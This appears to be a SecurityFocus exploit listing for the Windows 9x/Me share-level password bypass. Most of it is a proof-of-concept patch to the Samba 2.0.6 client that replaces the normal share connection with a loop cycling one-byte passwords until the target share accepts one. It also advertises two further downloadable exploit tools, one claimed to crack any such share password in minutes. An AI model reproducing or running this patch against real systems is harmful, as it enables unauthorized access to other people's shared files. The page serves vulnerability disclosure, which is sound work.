Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability

Nsfocus <security@nsfocus.com> has released the following proof-of-concept code:

--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

DEBUG(4,(" session setup ok\n"));

+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));

DEBUG(4,(" tconx ok\n"));

Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de> has released the following sharehack2.zip for the password verfication exploit discovered by Nsfocus Security Team. The program hacks every win9x/me share password in less than 2 minutes, 10 minutes for internet (c sourcecode included)

Gabriel Maggiotti <gmaggiot@ciudad.com.ar> has provided the following exploit:

netbios.tar.gz


 

Privacy Statement
Copyright 2010, SecurityFocus